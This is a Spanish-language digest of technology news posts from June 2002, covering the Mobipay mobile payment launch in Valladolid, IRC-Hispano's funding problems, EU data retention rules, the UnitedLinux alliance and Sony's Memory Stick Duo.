El sistema de pagos Mobipay inicia su andadura en Valladolid
Noticia enviada el Miércoles 5 de Junio de 2002 por CarLoS30

Mobipay España, el sistema de pagos a través del teléfono móvil participado por los tres operadores de telefonía móvil operativos (Amena, Telefónica Móviles y Vodafone), las tres sociedades procesadoras de medios de pago (Euro 6000, Sermepa y Sistema 4B) y las principales entidades financieras (que representan aproximadamente el 80% del sistema español de medios de pago), comienza sus actividades con su lanzamiento comercial en Valladolid.

Esta es una experiencia pionera en todo el mundo en lo que supone el lanzamiento comercial de un sistema de pagos con móvil, que permite que los clientes de una misma ciudad podrán realizar sus compras de forma rápida, sencilla y segura sin cambiar de entidad financiera, tarjeta de pago ni teléfono móvil.

Mobipay garantiza la máxima seguridad en las transacciones, porque el comprador comprueba en la pantalla los datos de su compra y los acepta tecleando el código secreto que sólo él conoce, lo que impide que nadie más pueda hacer compras incluso si el terminal es sustraído.

La plataforma tecnológica espera ser un estándar para pagos con el móvil a la que tengan acceso todos los operadores de telefonía móvil y todos los emisores de medios de pago en igualdad de condiciones.


Fuente: Noticias.Com y MobiPay

2º Desafío de CDLR
Noticia enviada el Martes 4 de Junio de 2002 por alex

Los chicos de la "R" quieren "hacernos ejercitar a las neuronas..."
Una excelente idea, a ver quién se anima:
2º Desafío de CDLR
Solución al primer Reto

Visitar cdlr.org

Sisco de Irc-Hispano amenaza con cerrar por falta de fondos
Noticia enviada el Martes 4 de Junio de 2002 por alex

"O los usuarios pagan algunos servicios, o no vamos a poder ofrecer ni lo gratuito."

Así de contundente se muestra Sisco Sapena, recientemente reelegido presidente de IRC-Hispano, la comunidad de chat más importante de habla hispana.

Mucho se le ha criticado a Sisco Sapena su decisión reiterada de cobrar por determinados servicios suplementarios del IRC-Hispano, a lo que inmediatamente responde: “aunque constituidos como asociación sin ánimo de lucro, somos empresas comerciales, y hay que generar unos ingresos porque de lo contrario, no podremos ofrecer ni siquiera lo gratuito”.

Entrevista a Sisco Sapena en IBLNews

En Europa obligarían a los ISP a guardar perfiles de sus clientes
Noticia enviada el Martes 4 de Junio de 2002 por CarLoS30

30/05/02

Una nueva norma sobre la regulación en Internet ha sido aprobada por el Parlamento Europeo. Por esta nueva legislación, se obligaría a los proveedores de Internet y a las telefónicas a guardar un registro de los hábitos de navegación de sus usuarios. La justificación de esta medida sería que con esa información sería más fácil perseguir a criminales y terroristas.

Una ley similar ya fue rechazada en los Estados Unidos. Sin embargo, esta normativa aprobada por el Parlamento Europeo ahora deberá tener luz verde de los 15 gobiernos de la Unión Europea, algo que se descuenta sucederá.

Varias compañías telefónicas se han opuesto a la norma, ya que estiman que implementar este sistema de espionaje les costaría una enorme inversión, que además sería muy compleja de implementar. También varias organizaciones de defensa de los derechos civiles han manifestado su rechazo a esta legislación.


Fuente : Tectimes < www.tectimes.com >

Los linuxeros sean unidos
Noticia enviada el Martes 4 de Junio de 2002 por CarLoS30

Cuatro empresas que diseñaron sus propias versiones del sistema operativo Linux anunciaron que se unirán con el fin de crear una edición para negocios. Ellas son Turbolinux, Caldera, SuSE y Conectiva. La mayor de las compañías en el segmento de Linux, Red Hat, no se unirá a la iniciativa.

La distribución se llamará UnitedLinux, y se comenzaría a vender para fin de año, aunque cada firma lo venderá bajo su propia marca.

Las cuatro empresas unirán fuerzas y fondos para desarrollar de forma conjunta una “business edition” del sistema operativo de código abierto. Además, todas brindarían soporte para la versión, por lo que esperan que haya un buen recibimiento en el mercado corporativo.

Fuente : Tectimes < www.tectimes.com >

Sony prepara una nueva versión de Memory Stick
Noticia enviada el Martes 4 de Junio de 2002 por CarLoS30

La compañía Sony anunció que para julio de este año serán lanzada al mercado la nueva versión de sus tarjetas de almacenamiento Memory Stick, y que se conocerán como Memory Stick Duo. Éstas tendrán un tamaño de apenas un tercio que las actuales, por lo que podrán ser usadas por dispositivos como celulares y pequeños reproductores de audio.

En los dos últimos años, Sony ha logrado que su sistema de almacenamiento, en principio creado para sus dispositivos, gane mercado de forma lenta pero progresiva. De acuerdo a la firma, se vendieron 20 millones de tarjetas en marzo.

Ahora, las expectativas de Sony se concentran en abarcar al menos un tercio del mercado de tarjetas de almacenamiento para celulares, un mercado que alcanzó una facturación de U$S 1300 millones el año pasado.


Fuente : Tectimes ( www.tectimes.com )